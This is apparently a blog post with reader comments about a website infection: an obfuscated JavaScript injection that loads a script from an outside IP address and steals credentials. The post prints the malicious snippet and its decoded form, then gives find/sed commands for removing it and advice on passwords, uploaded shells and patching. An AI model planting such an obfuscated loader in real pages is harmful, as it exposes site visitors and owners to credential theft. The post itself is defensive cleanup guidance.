If you have this code in your site it is imperative that you change all of your passwords. DO NOT go to ANY of the sites listed on this post.
document.write(unescape('
%3CGXscrLrGXirLpt%20VhsrcrL%3DSn%2FHY8%2F78HY8%2EGX1GX1Cl60%2ECl6
1Cl67Cl65Cl6%2E24Vh9zAn%2FCl6jquVheHY8rrLyCl6%2EjSns%3EGX%3C%2FGXsz
AnczAnrHY8iprLtzAn%3E
').
replace(/Cl6|HY8|zAn|Sn|rL|Vh|GX/g,""));
It may look slightly different, but it translates to the same thing.
script src = 94.247.2.195/jquery.js
I’ve removed tags and such to prevent possible mishaps. Bottom line, is this script can, and has, hijacked usernames and passwords sent over the network.
I have a few shell scripts that will help clear it off your pages (thanks to http://eriknomitch.com/ (SAFE link) for the help). You may want to completely disable all your sites by creating an .htaccess file in your home directory with nothing but “deny from all” in its contents. This will stop ALL of your websites from serving until it is removed. Be warned. Security is very important here, so I would recommended it.
First, have a look at your source, and find a group of characters (I’ll use “Cl6jquVhe” from the example above) that have only letters/numbers, and are not likely to appear on any of your other sites, anywhere. I think Cl6jquVhe should be safe. Run this following script, replacing my string with yours, from your users root html directory (/home/username/public_html or something similar)
find ./ -iname '*.html' -exec sed -i 's/<script.*Cl6jquVhe.*script>//g' {} ;
Repeat that script for all extensions on your site that could be served as web pages, and javascript files. ex: php,asp,aspx,htm,js. this will search through and remove all instances of that script, using wonderful regex. This, however, may not remove them all. Have a look at your files, and make sure it isn’t lurking about still, under guise of slightly different code. If this is in fact the case, I have a more powerful, but slightly risky script to run.
Please do not run this next script unless you know your code well. It may break some of your javascript code if you are not careful. If you are certain that none of your scripts (3rd party plugins, too!) do not use the javascript unescape method, then continue. In reality, the unescape method is used fairly rarely, but running a search for all the files on your site that have it will product a lot of results, from the infected files. Use the following with great caution!
find ./ -iname '*.html' -exec sed -i 's/<script.*unescape.*script>//g' {} ;
Again, replace html with all extentions. Do NOT try to “be smart” and change the ‘*.html’ to ‘*’, as you may end up damaging other files, especially in this case!
Run a find . -iname “*.html” | xargs grep “unescape” -sl to check your results (for all extentions). This will return a list of files that are still infected. It should be zero.
IMPORTANT.
You’ll want to scour your site for files you do not recognize! This was most likely caused by an exploit in outdated software, such as an old WordPress or Zencart installation, allowing the attacker to upload a file that lets them have their way with your site. It will most likely be a php file, with a random name. You’ll want to be certain to find and remove this before allowing access back to your sites
IMPORANT #2
Your site is still vulnerable to attack! Find and upgrade all old installations of software! Remove what you don’t need! Find a program like Acunetix to do a security check on your site, and keep up with it! Best of luck to all!
Oh yeah, did I mention to change your passwords?
Beware, the source of the attack is a trojan (packet sniffer) on a developer’s Windows machine that catches all data between your FTP client and the server.
Changing your passwords won’t be enough if you do not disinfect your PC first.
I explained it on my website (in French). and some guy translated it on his : http://bit.ly/qFY1x
thank’s for information but is’nt there any script bec i’ll have large number of sites on my host thank’s